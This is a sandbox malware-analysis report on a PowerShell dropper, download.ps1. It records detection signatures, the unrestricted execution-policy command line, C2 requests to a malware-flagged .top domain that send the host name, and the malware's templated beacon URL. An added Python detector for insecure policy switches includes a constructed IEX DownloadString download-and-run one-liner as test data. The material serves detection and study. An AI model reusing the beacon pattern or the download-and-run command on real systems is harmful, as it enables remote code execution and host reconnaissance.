Windows Analysis Report
download.ps1

Overview

General Information

Sample name: download.ps1
Analysis ID: 1578248
MD5: f91e3c78bfc0cc41330d65764455a851
SHA1: 294c15d09a7df4d91e891d7ca3bc2803c8262ce1
SHA256: 3cef01524b94194e6e6834746b8215ebdd4b51c29e92187d6e59e8be1b365934
Tags: KongTuke, ps1, user-monitorsg

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 4164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4164, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4164, ProcessName: powershell.exe
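Both Sigma matches above key on the `-ExecutionPolicy unrestricted` switch in the captured command line. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it approximates that detection over process-creation records in Sysmon Event ID 1 / Security 4688 shape. The records are constructed; only the first command line is the one captured here (PID 4164). Matching abbreviated switches (`-ep`, `-exec`) and the severity bump for scripts under a user-writable path are this example's own choices, not logic taken from the Sigma rules.

```python
import re

# Constructed process-creation records. Only the first CommandLine is real:
# it is the one the sandbox captured for download.ps1 (PID 4164). The other
# three are made up for contrast (assumed, not from the report).
SAMPLE_EVENTS = [
    {"ProcessId": 4164, "ParentProcessId": 1028,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo '
                    r'-ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"'},
    {"ProcessId": 5120, "ParentProcessId": 4000,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -ep bypass -c "
                    r"IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/a'))"},
    {"ProcessId": 5121, "ParentProcessId": 4000,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"},
    {"ProcessId": 5122, "ParentProcessId": 4000,
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": r"pwsh.exe -NoProfile -Command Get-Date"},
]

# powershell.exe accepts any unambiguous prefix of a parameter name, so
# -ep, -ex, -exec and -executionpolicy all select ExecutionPolicy.
POLICY_SWITCH = re.compile(r"(?:^|\s)-(?:ep|ex[a-z]*)\s+(unrestricted|bypass)\b", re.I)
# The same levels set from inside a command via the cmdlet.
POLICY_CMDLET = re.compile(
    r"set-executionpolicy\s+(?:-executionpolicy\s+)?(unrestricted|bypass)\b", re.I)
# A script under a user-writable path (here: the user's Desktop) is the usual
# shape of a user-delivered dropper. Assumed severity bump, not Sigma logic.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(?:desktop|downloads|appdata)\\", re.I)


def insecure_policy(cmdline):
    """Return 'unrestricted' or 'bypass' if the command line lowers the policy, else None."""
    m = POLICY_SWITCH.search(cmdline) or POLICY_CMDLET.search(cmdline)
    return m.group(1).lower() if m else None


def scan(events):
    """Return one finding per event whose command line lowers the execution policy."""
    findings = []
    for ev in events:
        cmd = ev["CommandLine"]
        level = insecure_policy(cmd)
        if level is None:
            continue
        findings.append({
            "pid": ev["ProcessId"],
            "parent_pid": ev["ParentProcessId"],
            "level": level,
            "severity": "high" if USER_WRITABLE.search(cmd) else "medium",
            "cmdline": cmd,
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] pid={f['pid']} level={f['level']}: {f['cmdline']}")
```

Run against the constructed records, the captured command line is reported as `unrestricted` with high severity (script on the Desktop) and the `-ep bypass` one-liner as `bypass`; `RemoteSigned` and a plain `pwsh -Command` produce nothing. The parent PID (1028 here, with no parent image recorded) is kept in the finding because the launching process is the next pivot in an investigation.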
No Suricata rule has matched

AV Detection

Source: http://cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527 | Avira URL Cloud: Label: malware
Source: http://cmacnnkfbhlcncm.top | Avira URL Cloud: Label: malware
Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbu source: powershell.exe, 00000000.00000002.2186794681.00000225C4C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2140421912.00000225AA652000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2140421912.00000225AA652000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbS source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2183490540.00000225C4824000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2184943759.00000225C4BD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2184943759.00000225C4B17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb: source: powershell.exe, 00000000.00000002.2187129153.00000225C4CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbP source: powershell.exe, 00000000.00000002.2186794681.00000225C4C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbdll source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData

Networking

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 45.61.136.138
Source: global traffic | HTTP traffic detected: GET /o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: cmacnnkfbhlcncm.top Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: cmacnnkfbhlcncm.top
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225ADC18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?id=$env:computername&key=$ijkcxgoqtupsma&s=527
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE00F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225ADC18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top
Source: powershell.exe, 00000000.00000002.2141075548.00000225ADC18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527
Source: powershell.exe, 00000000.00000002.2183490540.00000225C4898000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000000.00000002.2183490540.00000225C4898000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro6
Source: powershell.exe, 00000000.00000002.2184584754.00000225C4910000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC74D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEC38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEF52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AEDB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC983000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2141075548.00000225AC6E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE00F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.2141075548.00000225AC6E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE24E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC983000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC9D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC74D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC74D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC74D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE00F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC8B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE24E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC983000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC9D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC74D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE167000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC949000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.c
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-20
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gif
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifX
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE24E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC983000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC9D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE24E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF848F47AC6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF848F48872
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfgX
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE24E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE24E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg`
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
